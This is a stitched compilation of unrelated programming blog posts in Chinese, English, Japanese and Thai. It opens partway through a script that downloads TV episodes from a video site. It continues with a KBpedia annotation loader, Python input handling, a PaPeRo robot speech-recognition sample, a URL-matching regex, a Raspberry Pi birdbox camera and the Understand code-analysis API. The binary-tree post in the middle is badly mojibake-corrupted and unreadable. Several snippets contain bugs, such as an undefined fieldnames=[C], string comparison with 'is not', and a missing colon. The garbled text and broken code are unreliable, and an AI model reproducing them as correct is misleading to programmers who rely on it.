'http://www.tv3w.com/dushiqinggan/wuchizhitudierji/3-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudisanji/4-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudisiji/4-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiwuji/7-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiliuji/7-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiqiji/6-1.html']
for i in range(len(section_url)):
print('开始下载第{}季...'.format(i+1))
episode_url = get_m3u8_list(url=section_url[i],S=i+1) # 获取每季中每一集的m3u8地址
download(episode_url,savefile_path,i+1) # 下载每一季的ts文件并拼接
print('done')
目标网站的资源前七季的源是同一个,这里只获取前七季。
第一写完整的爬虫代码,可以改进的地方有很多:
可以改为自动获取m3u8真实地址。
使用多线程下载,提高下载速度。
添加文件验证机制,确保下载正确。
本文作者:Kangshitao
本文链接:http://kangshitao.github.io/2021/01/02/crawler-wuchizhitu/index.html
版权声明:本博客所有文章均采用 BY-NC-SA 许可协议,转载请注明出处!
|
More Fields, But Less Complexity
We now tackle the ingest of annotations for classes and properties in this installment of the Cooking with Python and KBpedia series. In prior installments we built the structural aspects of KBpedia. We now add the labels, definitions, and other assignments to them.
As with the extraction routines, we will split these efforts into class annotations and then property annotations. Our actual load routines are fairly straightforward, and we have no real logic concerns in how these annotations get added. The most complex wrinkle we will need to address are those annotation fields, altLabels and notes in particular, where we have potentially many assignments for a single reference concept (RC) or property. Like we saw with the extraction routines, for these items we will need to set up additional internal loops to segregate and assign the items for loading based on our standard double-pipe (‘||’) delimiter.
The two functions we develop in this installment, class_annot_builder and prop_annot_builder will be added to the build.py module.
Start-up
Since we are in an active part of the build cycle, we want to continue with our main knowledge graph in-progress for our load routine, so please make sure that kb_src is set to ‘standard’ in your config.py configuration. We then invoke our standard start-up:
from cowpoke.__main__ import *
from cowpoke.config import *
Loading Class Annotations
Class annotations consist of potentially the item’s prefLabel, altLabels, definition, and editorialNote. The first item is mandatory, the next two should be provided to adhere to best practices. The last is optional. There are, of course, other standard annotations possible. Should your own conventions require or encourage them, you will likely need to modify the procedure below to account for that fact.
As with these methods before, we provide a header showing ‘typical’ configuration settings (in config.py), and then proceed with a method that loops through all of the rows in the input file. Here is the basic class annotation build procedure. There are no new wrinkles in this routine from what has been seen previously:
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : file_dict.values(), # see 'in_file'
# 'loop' : 'class_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/classes/Generals_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts_test.csv',
def class_annot_build(**build_deck):
print('Beginning KBpedia class annotation build . . .')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
class_loop = build_deck.get('class_loop')
# r_id = ''
# r_pref = ''
# r_def = ''
# r_alt = ''
# r_note = ''
if loop is not 'class_loop':
print("Needs to be a 'class_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=[C])
for row in reader:
r_id_frag = row['id']
id = getattr(rc, r_id_frag)
if id == None:
print(r_id_frag)
continue
r_pref = row['prefLabel']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
id.definition.append(r_def)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
print('KBpedia class annotation build is complete.')
class_annot_build(**build_deck)
kb.save(file=r'C:/1-PythonProjects/kbpedia/v300/targets/ontologies/kbpedia_reference_concepts_test.owl', format='rdfxml')
BTW, when we commit this method to our build.py module, we will add the save routine at the end.
Loading Property Annotations
We now turn our attention to annotations of properties:
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : prop_dict.values(), # see 'in_file'
# 'loop' : 'class_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/properties/prop_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts_test.csv',
def prop_annot_build(**build_deck):
print('Beginning KBpedia property annotation build . . .')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
out_file = build_deck.get('out_file')
if loop is not 'property_loop':
print("Needs to be a 'property_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=['id', 'prefLabel', 'subPropertyOf', 'domain',
'range', 'functional', 'altLabel', 'definition', 'editorialNote'])
for row in reader:
r_id = row['id']
r_pref = row['prefLabel']
r_dom = row['domain']
r_rng = row['range']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
r_id = r_id.replace('rc.', '')
id = getattr(rc, r_id)
if id == None:
print(r_id)
continue
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
i_dom = r_dom.split('||')
if i_dom != ['']:
for item in i_dom:
id.domain.append(item)
if 'owl.' in r_rng:
r_rng = r_rng.replace('owl.', '')
r_rng = getattr(owl, r_rng)
id.range.append(r_rng)
elif r_rng == ['']:
continue
else:
# id.range.append(r_rng)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
id.definition.append(r_def)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
print('KBpedia property annotation build is complete.')
prop_annot_build(**build_deck)
Hmmm. One of the things we notice in this routine is that our domain and range assignments have not been adequately picked up in our earlier KBpedia version 2.50 build routines (the ones undertaken in Clojure before this CWPK series). As a result, we can not adequately test range and will need to address this oversight before our series is over.
As before, we will add our ‘save’ routine as well when we commit the method to the build.py module.
kb.save(file=r'C:/1-PythonProjects/kbpedia/v300/targets/ontologies/kbpedia_reference_concepts_test.owl', format='rdfxml')
We now have all of the building blocks to create our extract-build roundtrip. We summarize the formal steps and configuration settings in CWPK #47. But, first, we need to return to cleaning our input files and instituting some unit tests.
|
    æå°äºåæ æå³ä¾§èç¹å
¶å®æ¯æ¹èªäºåæ ç屿¬¡éåï¼å¤äºä¸æ¥ï¼å³è¾åºæ¯ä¸å±çæ«å°¾èç¹ãå¦ä¸é¢ï¼è¾åºæå³ä¾§èç¹ç»æåºä¸º [3,20,7]ã
é¦å çäºåæ ç屿¬¡éåï¼ä½¿ç¨éåï¼queueï¼æ¥åå¨äºåæ çèç¹ï¼
å ·ä½ä»£ç 屿¬¡éåå®ç°ï¼
def levelOrder(self, root: TreeNode) -> List[List[int]]:
list = []
if root is None:return list
queue = [root]
while queue:
cur = []
for i in range(len(queue)):
node = queue.pop(0)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
cur.append(node.val)
list.append(cur)
return list
 æå°åºäºåæ æå³ä¾§èç¹ï¼
# 打å°äºŒå‰æ ‘最å³èŠ‚ç‚¹
def printRightNode(self, root):
queue = [root]
list = []
while queue:
res = []
# æŽ§åˆ¶äºŒå‰æ ‘æ¯å±‚的节点
for i in range(len(queue)):
node = queue.pop(0)
if node.lchild:
queue.append(node.lchild)
if node.rchild:
queue.append(node.rchild)
res.append(node.key)
list.append(res)
ans = []
for i in list:
# å–æ¯å±‚最åŽä¸€ä¸ªèŠ‚ç‚¹å³ä¸ºæœ€å³èŠ‚ç‚¹
ans.append(i[-1])
print(ans)
Â
|
本文介绍了
raw_input和input在python2和python3上的区别,以及如何利用正则表达式和input键盘输入一维数组和二维数组。
raw_input 和 input
python2中
raw_input_A = raw_input("raw_input: ")
type(raw_input_A)
可以看到输出的是 str
input_A = input("Input: ") #不能输入字母
type(raw_input_A)
可以看到输出的是 int,并且我们发现,input根本不能输入字母,会直接报NameError: name 'abc' is not defined,提示没有定义。
查看 Built-in Functions ,得知:
`input([prompt])
Equivalent to eval(raw_input(prompt)) `
input() 本质上还是使用 raw_input() 来实现的,只是调用完 raw_input() 之后再调用 eval() 函数,所以,你甚至可以将表达式作为 input() 的参数,并且它会计算表达式的值并返回它。
不过在 Built-in Functions 里有一句话是这样写的:Consider using the raw_input() function for general input from users.
除非对 input() 有特别需要,否则一般情况下我们都是推荐使用 raw_input() 来与用户交互。
python3中
因为刚才说的那个原因,input其实没有什么必要,所以就被改进了。
简单来说,raw_input没有了,只剩下input。现在这个input就是之前那个raw_input。
查看 [Python官方文档input([prompt])](https://docs.python.org/3/library/functions.html#input) ,得知:
If the prompt argument is present, it is written to standard output without a trailing newline. The function then reads a line from input, converts it to a string (stripping a trailing newline), and returns that. When EOF is read, EOFError is raised.
简单说,返回的内容都是str,括号里边的prompt写什么,就会当做提示内容输出。比如底下的那个 -->
>>> s = input('--> ')
--> Monty Python's Flying Circus
>>> s
"Monty Python's Flying Circus"
因为我一般都是用python3,接下来的内容都是以3为准。
Python输入数组
一维数组
使用int()进行强制类型转型
当输入内容不为数字时,不能转型,发生except跳出循环。
先声明data是一个list,将input_A一个个+进去。
data = []
while True:
try:
input_A = int(input("Input: "))
data +=[input_A]
except:
break
data
type(data)
在以上的基础上,我们可以用python输入二维数组
python输入二维数组
正则表达式会利用非数字的字符,进行切割,因此数字之间插入什么都无所谓。
import re
data2D = []
while True:
userInput = input('Input:') # 输入数组,用空格隔开即可
info = re.split(r'[\D]',userInput)#正则表达式分割
data = []# 定义一维数组
try:
for number in info:
data+=[int(number)] # 一维数组加入数字
data2D+=[data] #一维数组加入到二维中去
except:
break;
data2D
本文由 mmmwhy 创作,最后编辑时间为: May 21, 2018 at 10:12 pm
|
PaPeRo i 本体の音声認識機能は、
単語のみ
認識に一呼吸間が空く
認識語は数十語が限度?
ということでクラウド利用に比べると非力で、人と「会話」するアプリにはちょっと難しいかも知れませんが、「音声による指示」を行うアプリならば工夫次第で使えると思います。
Pythonから使用する手順
音声認識を開始するには基本的には以下の順でAPIを呼びます(標準辞書の場合)。
(1) send_read_dictionary(‘/opt/papero/lib/Standard.mrg’)
(2) send_add_speech_recognition_rule(‘Standard’)
(3) send_start_speech_recognition()
これらはレスポンスを待たずに立て続けに呼んでしまって大丈夫なようです。
これにより、detectPhraseイベントが発生するようになります。
detectPhraseイベントではキー=”Expression”に認識した言葉が入ってきます。
正しく認識出来なかった場合は”Expression”に”Reject”が入ってきます。
また、音声認識を有効にしたまま発話させるとそれを認識してしまうため、発話させたい場合には発話前に
send_stop_speech_recognition()
を呼び、発話終了後に
send_start_speech_recognition()
を呼んで再開させる必要があります。
複数の音声認識辞書を切り替える
あらかじめ複数の音声認識辞書用意しておき、それを場面場面で切り替えれば、アプリの幅をぐっと広げることが出来そうです。
APIの呼び順を間違えると二度と音声認識できない状態に陥ったりするのですが、試したところ以下の手順であれば、状態が、初めて、音声認識が有効、一度有効にした後無効にした場合、いずれの場合でも辞書を切り替えて正常に音声認識を開始できました。
(1) send_stop_speech_recognition()
(2) send_free_dictionary(”)
(3) send_read_dictionary(音声認識辞書ファイルパス)
(4) send_add_speech_recognition_rule(‘Standard’)
(5) send_start_speech_recognition()
サンプルプログラム
音声を認識すると認識した言葉を画面に表示し、向かって左ボタンで標準辞書、右ボタンでカスタム辞書(標準では搭載されていません)に切り替えるサンプルプログラムです。
ここでは発話はさせていませんが、上記の通り、発話もさせたい場合には発話状態を管理して音声認識停止・再開の制御を入れる必要がありますのでご注意ください。
import sys
from logging import (getLogger, Formatter, debug, info, warn, error, critical,
DEBUG, INFO, WARN, ERROR, CRITICAL, basicConfig)
import pypapero
logger = getLogger(__name__)
RECOG_DIC_STD = '/opt/papero/lib/Standard.mrg'
RECOG_DIC_ADD1 = '/opt/papero/lib/Standard_stdadd20180418.mrg'
def speech_recog_init(papero, dn=RECOG_DIC_STD):
logger.info('dictionary={}'.format(dn))
papero.send_stop_speech_recognition()
papero.send_free_dictionary('')
papero.send_read_dictionary(dn)
papero.send_add_speech_recognition_rule('Standard')
papero.send_start_speech_recognition()
papero.send_turn_led_on('ear', ["W2W2", str(int(2000 / 100)), "NN", str(int(2000 / 100))], repeat=True)
def speech_recog_fin(papero):
logger.info('recog fin')
papero.send_stop_speech_recognition()
#papero.send_delete_speech_recognition_rule('Standard')
papero.send_free_dictionary('')
papero.send_turn_led_on('ear', ["NN", str(int(1000 / 100))], repeat=False)
if __name__ == "__main__":
basicConfig(level=INFO, format='%(asctime)s %(levelname)s %(name)s %(funcName)s %(message)s')
simulator_id, robot_name, ws_server_addr = pypapero.get_params_from_commandline(sys.argv)
papero = pypapero.Papero(simulator_id, robot_name, ws_server_addr)
if papero.errOccurred == 0:
papero.send_start_speech("音声認識デモ")
speech_recog_init(papero)
while True:
messages = papero.papero_robot_message_recv(1.0)
if messages is None:
continue
if 0 == len(messages):
continue
msg0 = messages[0]
nm = msg0.get("Name")
if nm == "detectButton":
status = msg0["Status"]
if status == "R":
speech_recog_init(papero)
elif status == "L":
speech_recog_init(papero, RECOG_DIC_ADD1)
elif status == "C":
break
elif nm == "detectPhrase":
if "Expression" in msg0:
phrase = msg0["Expression"]
if phrase != "Reject":
logger.info(phrase)
else:
pass
speech_recog_fin(papero)
papero.papero_cleanup()
|
From time to time, I run across situations where the linkifying Greasemonkey script I use mistakenly includes a closing parenthesis in what it considers to be a URL.
Given that I can’t remember a single situation where I needed to linkify a URL with nested unescaped parentheses but URLs inside parentheses have bitten me repeatedly, I decided to solve the problem in a way that’ll work with any regex grammar.
const urlRegex = /\b((ht|f)tps?:\/\/[^\s+\"\<\>()]+(\([^\s+\"\<\>()]*\)[^\s+\"\<\>()]*)*)/ig;
Basically, it matches:
http,https,ftp, orftpsfollowed by://
an alternating sequence of “stuff” and balanced pairs of parentheses containing “stuff”
…where “stuff” to refers to a sequence of zero or more non-whitespace, non-parenthesis characters (and, in this linkify.user.js version, non-caret, non-double-quote too).
Embarassingly, aside from two corrections and a few extra characters in the blacklists that I kept from the original linkify.user.js regex, this is a direct translation of something I wrote for http://ssokolow.com/scripts/ years ago… I’d just never remembered the problem in a situation where I could spare the time and willpower to do something about it.
Here’s the corrected Python original.
hyperlinkable_url_re = re.compile(r"""((?:ht|f)tps?://[^\s()]+(?:\([^\s()]*\)[^\s()]*)*)""", re.IGNORECASE | re.UNICODE)
The corrections made were:
Allow the pairs of literal parentheses to be empty
Move a grouping parenthesis so that a(b)c(d)ewill be matched as readily asa(b)(c)d.
Markdown source code works especially well to demonstrate the difference.
Naive Linkifying Regex My Linkifying Regex
[FreeDOS](http://freedos.org). [FreeDOS](http://freedos.org).
Theoretically, look-ahead/behind assertions are enough of an extension to regexp syntax to allow real HTML parsing, so I could probably also support nested parens, but I’m just not in the mood to self-nerd-snipe right now.
|
A birdbox camera based on a Raspberry Pi Zero.
Introduction
We have a birdbox on the side of the house and thought that it would be interesting to be able to see which birds were using it, and possibly also see if chicks are raised there.
Here’s the kind of video that we get back (with the default settings).
Hardware
For the camera system, I’ve used a Raspberry Pi Zero W with a Noir camera (their standard camera with the IR cut filter removed). Illumination is a couple of 940nm IR LEDs that are from Adafruit. To control them, I’ve designed a simple PCB that uses a FAN5333B LED driver circuit. This will control the current that the LEDs draw regardless of what temperature the box gets to and will allow their brightness to be controlled with a signal from the Raspberry Pi, including turning them off to prevent wasting (more) electricity.
Temperature Sensor
In addition to the LED driver circuit, there is a DS18b20 temperature sensor on the Pi board to monitor the temperature in the enclosure. Just because. I soldered the sensor directly to the header connections on the Pi since space is limited, and soldered a 1206 surface-mount 10K resistor across the 3v3 and ~DQ lines to provide the pullup that it needs to work properly.
Getting the Raspberry Pi working
The instructions on the motioneye wiki don’t work for current pi as of 25 Oct 2020. I followed the instructions here: [Link to pimpingthepenguin.com] (https://www.pimpingthepenguin.com/2020/06/raspberry-pi-zero-setup-for-motion-eye).
which are based on the installation instructions on the motioneye wiki here [link to the motioneye GitHub page] (https://github.com/ccrisan/motioneye/wiki/Install-On-Raspbian).
In summary, you need to use: apt install python-pip python-dev libssl-dev libcurl4-openssl-dev libjpeg-dev zlib1g-dev python-pil instead of apt install python-pip python-dev libssl-dev libcurl4-openssl-dev libjpeg-dev libz-dev as given in the motioneye install instructions.
This gets the code to run, but it doesn’t connect to the camera properly. Also note that python2 is no longer supported on Raspbian, and python 3.7 is the default. This means that you need to issue pip2 install motion so that it’s explicitly installed on python 2.x on your system.
Once you’ve followed all the instructions, you should be able to log in to the motioneye interface using your web browser and add a camera. I found that the camera did initially not work. The issue with the camera was that the /dev/video10 device was chosen instead of video0, which is where the camera appeared on this pi. Edit /etc/motion/camera-1.conf to change the camera location to the correct one. Restart the motioneye server and it should work.
Enclosure
I purchased a wooden bird box from a local DIY store branded as ‘Peckish’. For the Raspberry Pi, I designed a simple enclosure that fits under the roof of the birdbox and printed it out in black PLA. The enclosure has a clip detail for the LED driver board, and mounting screws for the Raspberry Pi.
The LEDs are mounted either side of the Pi, and are pushed into place. A simple clip provides some strain relief on the power cable, which passes through a small hole at the font of the base. The lid itself is held on with a pair of M3 screws and I tapped a thread into the mating part to hold the screws. The Pi is held on four M2.5 screws which are screwed into tapped holes in the lid piece.
Assembly
The Pi fits into the base of the enclosure, which is held to the roof of the box with two screws. I sprayed the enclosure, and all of the electronics inside it with a conformal coating to try to keep moisture out.
Once the enclosure was assembled, I fitted it to the inside of the roof of the enclosure, and then protected everything with a small piece of roofing felt that we had left over from the last time the shed roof was repaired. This was heated using a hot air gun to get it to bend over the edges of the roof, and held in place with some small clout nails.
Power Supply
Power is supplied from a 5V, 15W supply that is mounted on the wall in the garage. I used a 1.5mm^2 core cable to minimise voltage drop from the internal cable resistance. At the top end, the cable is fed into the bird box, and is terminated in some heatshrink packed with silicone to keep everything dry. The final entry into the camera enclosure is done through smaller gauge wire that’s soldered to the large cable.
Controlling the LED
The LED illuminators are controlled with a GPIO pin on the raspberry pi. When it’s high, the LEDs are on, and when it’s low the LEDs are off. This means that they can be controlled remotely using software. I wrote some very very simple python code to turn the LED on for 25 seconds when motion is detected in the box. This means that the lights are off until something comes to have a look and then they’re turned on for the duration of the video recording (which itself is set to 30s).
#!/usr/bin/python import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) #Which GPIO addressing method to use. GPIO.setup(12, GPIO.OUT, initial=GPIO.HIGH) #Pin we're going to control GPIO.output(12, True) #On for 25s time.sleep(25) GPIO.output(12, False) #Then off again GPIO.cleanup()
Configuration
To make sure that the LED for the camera and activity on the Raspberry Pi are switched off to prevent disturbing the birds, add the following to the end of /boot/config.txt (you’ll need to be an admin on the pi):
#Disabling LEDs on the system to make it dark disable_camera_led=1 dtparam=act_led_trigger=none dtparam=act_led_activelow=on
The motion interface allows lots of settings to be adjusted. Until we’ve got nesting birds in the box, I set it up to be motion-activated and to record a 30 second clip whenever something moves in the box. Motion is able to detect and take-care of changes in ambient lighting, so dawn doesn’t cause images to be collected. At the same time as recording is started, I call a web hook to ifttt.com which fires a notification on my phone using the maker channel, and also the python script that turns on the LEDs to better-illuminate the bird in the box.
Conclusion
This has been an interesting little project, and one that has used a variety of skills from CAD, electronics design, 3D printing, electronics assembly, programming and setting up a little Linux machine. I’m looking forward to seeing the baby birds.
|
หลังจากที่เคยเขียนการใช้งาน understand API ด้วย python มาบ้างแล้ว แต่นานมาแล้ว
บล็อกตอนนี้จะมาเขียนละเอียดขึ้นมาหน่อย เป็นหลักเป็นการ อ่านง่ายขึ้น มี censor เยอะหน่อย เพราะเป็นงานภายในบริษัทเนอะ
ทำไมถึงใช้ understand เพราะว่าตัว source code ของโปรเจกมันเยอะมาก ถึงเราจะทำแค่บางตัวที่เขาสั่ง แต่เวลาเอาไปรันจริง มันใช้ทั้งหมดแหละ ดังนั้นเราจึงตรวจสอบไฟล์ที่เกี่ยวข้องกับไฟล์ที่เราเทสด้วย และการใช้โปรแกรมนี้สร้าง database ทำให้คนทำ in-house tool ทำงานง่ายขึ้น เพราะลำพังเขียน python ดักชื่อฟังก์ชั่น ชื่อตัวแปร คงจะลำบากน่าดู อีกทั้ง เรานะรู้ได้ยังไงว่านี่คือตัวแปร นี่คือฟังก์ชั่น
understand API รองรับให้ developer เอาไปพัฒนาต่อได้ตามใจ ในภาษา perl python และ C
ในที่นี้เป็น python เนอะ และเป็น python 3.0 ขึ้นไปด้วยนะ
การเปิดไฟล์ understand project ขึ้นมาอ่าน
import understand
db = understand.open("c:\\projects\\test.udb")
for file in db.ents("file"):
print(file.longname())
เรา import understand เพื่อเรียกใช้งาน library
จากนั้นเราเปิดไฟล์ udb อันเป็น understand project ที่เราสร้างขึ้น
ส่วนสองบรรทัดหลัง คือ ให้ปริ๊น path ของไฟล์ทั้งหมดออกมาแสดง
ข้อสังเกต เวลาเราจะอ่านไฟล์ เขียนไฟล์ path ต้องเขียน \\ คั่นเสมอ
เนื่องจากการเขียน \ ตามด้วย char สักตัว python มันจะมองเป็นอะไรสักตัวที่ผ่านการรวมร่างแล้ว (เหมือนมองเป็น trigraph มั้ง)
มาทำความรู้จัก Entity vs. Reference
Entity คือ สิ่งที่อยู่ในโค้ดของเรา ที่เราสามารถเอาไปใช้ได้ เช่น file, class, function, variable โดยเมื่อข้างบน คือการดูว่า มีไฟล์ไหนบ้างในโปรเจกของเรา
Reference คือ ตัวอ้างอิง ว่าอันนี้ อยู่ตรงไหนของโค้ด ซึ่งมีความสัมพันธ์ระหว่าง 2 entity
ใช้ตัวอย่างของเขาอธิบายดีกว่า
//myFile.c
void main(){
char myString[];
myString = "Hello World!";
}
อธิบายคร่าวๆ กล่องแรก บอกว่าไฟล์ชื่ออะไร อยู่ที่ไหน ใช้ภาษาอะไรเขียนต่อมา บอกว่า มีชื่อฟังก์ชั่นอะไร อยู่ในไฟล์ไหน บรรทัดเท่าไหร่
ตัวแปร myString มีการใช้งาน 2 ที่ คือ ใช้ประกาศตัวแปรด้านบน และเขียนค่าดังนั้น จึงมี referent 2 ที่ และเชื่อมกันระหว่าง function main และตัวมันเอง
การ filter entity ชนิดต่างๆ
ในตอนแรกที่เราให้ปริ๊นชื่อไฟล์ออกมา เป็นการ filter ว่าเราเอาเฉพาะชื่อไฟล์มาใช้งานนะ
ดังนั้น การใช้งาน เป็นแบบนี้
ents("<kind_filter>") ใส่ entity ที่เราต้องการหา คือ File, Class, Function, Variable, Attribute, LambdaParameter, Module, Package ใส่ไว้ในของฟันหนู
เราสามารถใช้ logic มาช่วยในการกรองข้อมูลที่เราต้องการได้ด้วย
NOT ใช้ตัว ~
AND ใช้ space
OR ใช้ ,
เช่น
ents("class, function")) //กรองชื่อ class และ function
ents("Global Object ~Static") //หา object ที่เป็น global ไม่เอา static
ents(function,method,procedure) //หาชื่อฟังก์ชั่น
การ sort ข้อมูล
ใส่ function sorted ไว้ด้านหน้าสิ่งที่เราจะเรียงข้อมูล
for ent in sorted(db.ents(), key = lambda ent: ent.name()):
print(ent.name(), "[", ent.kindname(), "]", sep = "", end = "\n")
A1 [Parameter]
A2 [Parameter]
F1 [Static Function]
B1 [Parameter]
การใช้ referent หาว่า entity ที่เราต้องการว่าถูกเรียกใช้ที่ไหน
for ent in db.ents("Global Object ~Static"):
print(ent, ":", sep="")
for ref in ent.refs():
print(ref.kindname(), ref.file(), "(", ref.line(), ",", ref.column(), ")")
print("\n", end="")
ในที่นี่เราอยากรู้ว่าตัวแปรที่เป็น global มีตัวแปรชื่ออะไรบ้าง
(logic คือ Global & Object & !Static)
ถูกทำอะไรที่ไหน ที่ไฟล์ไหน บรรทัดและคอลัมน์ที่เท่าไหร่
การใช้ regular expression
ก่อนอื่น import re ก่อนเพื่อเรียกใช้งาน regular expression
ถ้าเราหาไฟล์ชื่อที่เราต้องการ เช่น เราต้องการหาไฟล์ที่มีคำว่า test อยู่ เป็นไฟล์ .c
re.compile เป็นการหาคำตาม pattern ที่เราสนใจ
re.I คือ ignore case ไม่สนใจตัวใหญ่เล็ก สนใจว่าคำตรงกันไหม
searchstr = re.compile("test*.c", re.I)
for file in db.lookup(searchstr, "File"):
print(file)
แสดงฟังก์ชั่นพร้อมด้วย parameter
ในขั้นแรกเราทำ function key ก่อน
import string
def sortKeyFunc(ent):
return str.lower(ent.longname())
จากนั้นเรามา sorted ชื่อของ function พร้อมทั้ง parameter ของ function
ents = db.ents("function, method, procedure")
for func in sorted(ents, key = sortKeyFunc):
print (func.longname(), " (", sep="", end="")
first = True
for param in func.ents("Define", "Parameter"):
if not first:
print (", ", end="")
print (param.type(), param, end="")
first = False
print (")")
การตรวจสอบว่าแต่ละ function ถูกเรียกใช้ที่ function ใดบ้าง
for func in db.ents("function, method, procedure"):
for line in func.ib():
print (line, end="")
เราจะเลือกตัวที่เป็น function และบอกรายละเอียดว่า ถูก defined ที่ไหน return ค่าเป็นอะไร มี parameter ขาเข้าเป็นอะไร ชื่อ local variable ที่ใช้งานภายใน เรียกใช้ function อะไร ถูกใครเรียกต่อ มีมาโครอะไรให้ใช้ เจอที่ไหน ประมาณนี้
ถ้าเราจะหาตัวแปรหล่ะ เปลี่ยนด้านบนนิดหน่อย ดังนี้
for func in db.ents("variable, define, parameter"):
for line in func.ib():
print (line, end="")
หา comment ใน function
for func in db.ents("function ~unresloved ~unknown")
comments = func.comment("after")
if comments:
print (func.longname(), ":\n ", comments, ":\n", sep="")
Lexers and Lexemes
Lexers คือ ก้อนของข้อความที่มีความหมาย เช่น string, comment, variable
Lexemes คือ สตรีม (เข้าใจว่าน่าจะก้อนใหญ่ที่ใหญ่กว่า lexers)
เช่น int a=5;//radius
มันจะแยกคำในโค้ดออกมาเป็นดังนี้
อันนี้จะละเอียดกว่า entity กับ referent ตรงที่ มันบอกว่า อันนี้เป็น keyword นะ อันนี้เป็น operator ตรงนี้ comment นะเออ
ตัวอย่างโค้ด
def fileCleanText(file):
returnString = "";
# Open the file lexer with macros expanded and
# inactive code removed
for lexeme in file.lexer(False,8,False,True):
if(lexeme.token() != "Comment"):
# Go through lexemes in the file and append
# the text of non-comments to returnText
returnString += lexeme.text();
return returnString;
# Search for the first file named 'test' and print
# the file name and the cleaned text
file = db.lookup(".*test.*","file")[0];
print (file.longname());
print(fileCleanText(file));
อันนี้ทำ function เพื่อพิมพ์ค่าโค้ดทั้งหมดออกมา โดยไม่มี comment อยู่ด้วย
คำถาม : ถ้าเราลงลึกไปว่า เราสนใจ file นี้ variable นี้ ถูกเรียกใช้ที่ไหนหล่ะ
เนื่องจากตัวอย่างที่เราให้มา เอะอะก็วนลูป
เราอาจจะหาตัวแปรภายใน file นั้นๆ ออกมาแสดง จากนั้นก็เอาแต่ละอย่างมาทำอะไรต่อก็แล้วแต่เราแล้ว ในที่นี้ คือ ให้แสดงว่า ตัวแปรนี้ มีการประกาศตัวแปร กำหนดค่า ที่ไหน
ref.kindname จะมี Define, Type, Init, Set, Use, Addr Use
ent.ref().scope() อันนี้บอกชื่อตัวแปร ถ้าหาชื่อฟังก์ชั่นก็จะบอกชื่อฟังก์ชั่นแทน
ref.line() บอกบรรทัดที่เกิดเหตุการณ์ขึ้น
for func in db.ents("global object ~function !static ~local")
for ref in ent.refs():
if (str(ref.file()) == file_name):
print (ref.kindname(), ent.ref().scope(), ref.line())
คำถาม : อยากหาบรรทัดที่มีการเรียกใช้ header file ว่าเรียกใช้ไฟล์อะไรมาบ้าง
แต่ถ้ามีชื่อไฟล์คล้ายๆกัน เช่น aaa.c, aaa15.c แล้วเราอยากได้ aaa30.c หล่ะ
เราจะต้องกรอง db.lookup ให้ได้ชื่อไฟล์ที่เราต้องการก่อน จึงจะนำไปใช้ต่อได้
cnt = 0
file = udb.lookup(file_name,"file")
for i in file:
cnt+=1
if (str(i) == file_name + ".c"):
break
file = udb.lookup(file_name,"file")[cnt-1]
จากนั้นมาลุยกันต่อเลย ใช้ lexemes ในการหานะ lexeme.token() หลักๆ มีดังนี้
Comment อันนี้ซื่อๆ พวกคอมเมนต์
Identifier ชื่อตัวแปร ชื่อค่าคงที่ ชื่อฟังก์ชั่น
Keyword เช่น const static struct void if else break case default return for while
Literal ค่าของตัวแปรที่เรา assign ออกแนว magic number ในบางที่
Newline ขึ้นบรรทัดใหม่
Operator เช่น + - * / = ! || && อะไรพวกนี้
Preprocessor พวกที่มี # เช่น #include #define
Punctuation เช่น ( ) { } ;
String ก็สตริงนั่นหล่ะ
Whitespace สเปคปกตินั่นแหละ
ดังนั้นตามโจทย์ประมาณนี้นะ
for lexeme in file.lexer():
if (lexeme.token() == "Preprocessor"):
print (lexeme.line_begin(), lexeme.text())
สำหรับตอนนี้คงจะได้ความรู้เกี่ยวกับการใช้ understand API ใน python มากขึ้น
บอกก่อนเลยว่าบล็อกนี้ดองนานมาก เพราะต้องทำความเข้าใจ API ตัวนี้ บวกกับมีงานเทสที่เข้ามาด้วย เลยทำๆหยุดๆ และ understand database นี้ น่าจะเป็น NoSQL นะ เพราะไม่ได้เก็บค่า fixed แบบตาราง และข้อมูลบางตัว ก็เป็น one-to-many ด้วย เช่น ตัวแปรนี้ถูกเรียกที่ไหน โปรเจกนึงโค้ดก็เยอะแยะ พวก global variable ก็ใช้หลายที่อยู่
สำหรับผู้ที่สนใจเพิ่มเติม ตามด้านล่างนี้จ้า บอกเลยอากู๋ไม่ค่อยมีข้อมูลพวกนี้เท่าไหร่ ติดปัญหาทีก็หายากจัง
- API Tutorial 1: Writing Your First API Script
- API Tutorial 2: Entities, References and Filters
- API Tutorial 3: Lexers and Lexemes- Python Entity Kinds
- Understand::Ref class
- python interface to Understand databases
- 6.2. re — Regular expression operations — Python 3.5.2 documentation
|
